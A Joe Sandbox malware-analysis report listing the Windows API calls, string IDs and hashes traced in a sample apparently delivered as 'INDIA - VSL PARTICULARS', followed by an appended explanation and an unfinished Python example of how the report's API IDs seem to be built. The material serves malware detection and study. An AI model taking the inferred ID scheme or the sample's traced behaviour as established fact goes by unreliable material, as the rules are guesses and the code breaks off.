                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • SetErrorMode.KERNEL32(?), ref: 00478270
                              • SetErrorMode.KERNEL32(?), ref: 00478340
                              Similarity
                              • API ID: ErrorMode$AttributesFile_memmove_wcslen
                              • String ID: \VH
                              • API String ID: 3884216118-234962358
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 00434B10
                              • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                              • FreeLibrary.KERNEL32(?), ref: 00434B9F
                              Similarity
                              • API ID: Library$AddressFreeLoadProc
                              • String ID: AU3_GetPluginDetails$#v
                              • API String ID: 145871493-3662034293
                              APIs
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                              • IsMenu.USER32(?), ref: 0044854D
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                              • DrawMenuBar.USER32 ref: 004485AF
                              Similarity
                              • API ID: Menu$Item$DrawInfoInsert
                              • String ID: 0
                              • API String ID: 3076010158-4108050209
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                              • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              Similarity
                              • API ID: MessageSend$_memmove_wcslen
                              • String ID: ComboBox$ListBox
                              • API String ID: 1589278365-1403004172
                              Similarity
                              • API ID: Handle
                              • String ID: nul
                              • API String ID: 2519475695-2873401336
                              APIs
                              • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                              Similarity
                              • API ID: Handle
                              • String ID: nul
                              • API String ID: 2519475695-2873401336
                              Similarity
                              • API ID:
                              • String ID: SysAnimate32
                              • API String ID: 0-1011021900
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                              • GetFocus.USER32 ref: 0046157B
                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                              • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                              • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                              • __swprintf.LIBCMT ref: 00461608
                              Similarity
                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                              • String ID: %s%d
                              • API String ID: 2645982514-1110647743
                              APIs
                              • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                              • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                              Similarity
                              • API ID: Process$CloseCountersCurrentHandleOpen
                              • String ID:
                              • API String ID: 3488606520-0
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                              Similarity
                              • API ID: ConnectRegistry_memmove_wcslen
                              • String ID:
                              • API String ID: 15295421-0
                              APIs
                              • GetCursorPos.USER32(?), ref: 004563A6
                              • ScreenToClient.USER32(?,?), ref: 004563C3
                              • GetAsyncKeyState.USER32(?), ref: 00456400
                              • GetAsyncKeyState.USER32(?), ref: 00456410
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                              Similarity
                              • API ID: AsyncState$ClientCursorLongScreenWindow
                              • String ID:
                              • API String ID: 3539004672-0
                              APIs
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                              • Sleep.KERNEL32(0000000A), ref: 0047D455
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                              Similarity
                              • API ID: Interlocked$DecrementIncrement$Sleep
                              • String ID:
                              • API String ID: 327565842-0
                              • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                              • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                              • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                              APIs
                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                              Similarity
                              • API ID: PrivateProfile$SectionWrite$String
                              • String ID:
                              • API String ID: 2832842796-0
                              • Opcode ID: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                              • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                              • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                              APIs
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                              • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                              Similarity
                              • API ID: Enum$CloseDeleteOpen
                              • String ID:
                              • API String ID: 2095303065-0
                              • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                              • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                              • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00436A24
                              Similarity
                              • API ID: RectWindow
                              • String ID:
                              • API String ID: 861336768-0
                              • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                              • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                              • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                              APIs
                              • SendMessageW.USER32 ref: 00449598
                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                              • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                              • _wcslen.LIBCMT ref: 0044960D
                              • _wcslen.LIBCMT ref: 0044961A
                              • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                              Similarity
                              • API ID: MessageSend$_wcslen$_wcspbrk
                              • String ID:
                              • API String ID: 1856069659-0
                              • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                              • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                              • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                              APIs
                              • GetCursorPos.USER32(?), ref: 004478E2
                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                              • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                              • GetCursorPos.USER32(00000000), ref: 0044796A
                              • TrackPopupMenuEx.USER32(00A063D0,00000000,00000000,?,?,00000000), ref: 00447991
                              Similarity
                              • API ID: CursorMenuPopupTrack$Proc
                              • String ID:
                              • API String ID: 1300944170-0
                              • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                              • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                              • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004479CC
                              • GetCursorPos.USER32(?), ref: 004479D7
                              • ScreenToClient.USER32(?,?), ref: 004479F3
                              • WindowFromPoint.USER32(?,?), ref: 00447A34
                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                              Similarity
                              • API ID: Client$CursorFromPointProcRectScreenWindow
                              • String ID:
                              • API String ID: 1822080540-0
                              • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                              • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                              • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                              • EndPaint.USER32(?,?), ref: 00447D13
                              Similarity
                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                              • String ID:
                              • API String ID: 659298297-0
                              • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                              • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                              • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                              APIs
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                • Part of subcall function 00440D98: SendMessageW.USER32(00A01B18,000000F1,00000000,00000000), ref: 00440E6E
                                • Part of subcall function 00440D98: SendMessageW.USER32(00A01B18,000000F1,00000001,00000000), ref: 00440E9A
                              Similarity
                              • API ID: Window$EnableMessageSend$LongShow
                              • String ID:
                              • API String ID: 142311417-0
                              • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                              • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                              • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                              • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                              • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                              APIs
                              • IsWindowVisible.USER32(?), ref: 00445879
                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                              • _wcslen.LIBCMT ref: 004458FB
                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                              Similarity
                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                              • String ID:
                              • API String ID: 3087257052-0
                              • Opcode ID: f26ab1effd119969bc5c598581689495e0ac117966367203f6a60304a78e27fd
                              • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                              • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                              APIs
                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                              • socket.WSOCK32(00000002,00000001,00000006), ref: 004653FE
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                              • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                              • closesocket.WSOCK32(00000000), ref: 00465481
                              Similarity
                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                              • String ID:
                              • API String ID: 245547762-0
                              • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                              • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                              • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 004471D8
                              • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • SelectObject.GDI32(?,00000000), ref: 00447228
                              • BeginPath.GDI32(?), ref: 0044723D
                              • SelectObject.GDI32(?,00000000), ref: 00447266
                              Similarity
                              • API ID: Object$Select$BeginCreateDeletePath
                              • String ID:
                              • API String ID: 2338827641-0
                              • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                              • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                              • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00434598
                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                              • Sleep.KERNEL32(00000000), ref: 004345D4
                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                              Similarity
                              • API ID: CounterPerformanceQuerySleep
                              • String ID:
                              • API String ID: 2875609808-0
                              • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                              • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                              • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                              • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                              • MessageBeep.USER32(00000000), ref: 00460C46
                              • KillTimer.USER32(?,0000040A), ref: 00460C68
                              • EndDialog.USER32(?,00000001), ref: 00460C83
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                              • String ID:
                              • API String ID: 3741023627-0
                              • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                              • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                              • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                              • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$Icon
                              • String ID:
                              • API String ID: 4023252218-0
                              • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                              • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                              • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                              • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                              APIs
                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                              • String ID:
                              • API String ID: 1489400265-0
                              • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                              • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                              • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                              • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                              APIs
                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                              • DestroyWindow.USER32(?), ref: 00455728
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                              • String ID:
                              • API String ID: 1042038666-0
                              • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                              • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                              • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                              • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Path$ObjectStroke$DeleteFillSelect
                              • String ID:
                              • API String ID: 2625713937-0
                              • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                              • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                              • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                              • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                              APIs
                              • __getptd.LIBCMT ref: 0041780F
                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                              • __getptd.LIBCMT ref: 00417826
                              • __amsg_exit.LIBCMT ref: 00417834
                              • __lock.LIBCMT ref: 00417844
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                              • String ID:
                              • API String ID: 938513278-0
                              • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                              • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                              • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                              • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                              APIs
                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                              • ExitThread.KERNEL32 ref: 00413D4E
                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                              • __freefls@4.LIBCMT ref: 00413D74
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                              • String ID:
                              • API String ID: 2403457894-0
                              • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                              • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                              • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                              • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
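The `API ID` under each Similarity block is the key the report uses to relate a function to functions seen in other analyses. Joe Sandbox does not document how it is built, but the records above are enough to reconstruct it: every API name in the list (subcall entries included) is split at each uppercase letter, fragments shorter than four characters are dropped (`Get`, `Set`, `Tls`, `Dlg`, `End`, `Cxx`, the trailing `W` never appear in an ID; `Icon`, `Rect`, `Send` do), the surviving tokens are counted, tokens are grouped by descending count, each group is sorted in byte order and concatenated, and the groups are joined with `$`. The Python below is an added example, not Joe Sandbox's own code; the four-character cut-off and the byte-order sort are inferences that hold for every record in this section, and the `String ID` and the numeric `API String ID` are not reconstructed.

```python
import re
from collections import Counter

# Fragments shorter than this never appear in the IDs on this page ("Get",
# "Tls", "Dlg", "End" are all missing) while four-letter ones do.
# Inferred from the report's records, not documented by Joe Sandbox.
MIN_TOKEN_LEN = 4


def tokenize(api_name: str) -> list[str]:
    """Split an API name at every uppercase letter.

    'GetWindowTextW'            -> ['Get', 'Window', 'Text', 'W']
    '__updatetlocinfoEx_nolock' -> ['__updatetlocinfo', 'Ex_nolock']
    '__getptd_noexit'           -> ['__getptd_noexit']  (no uppercase: kept whole)
    """
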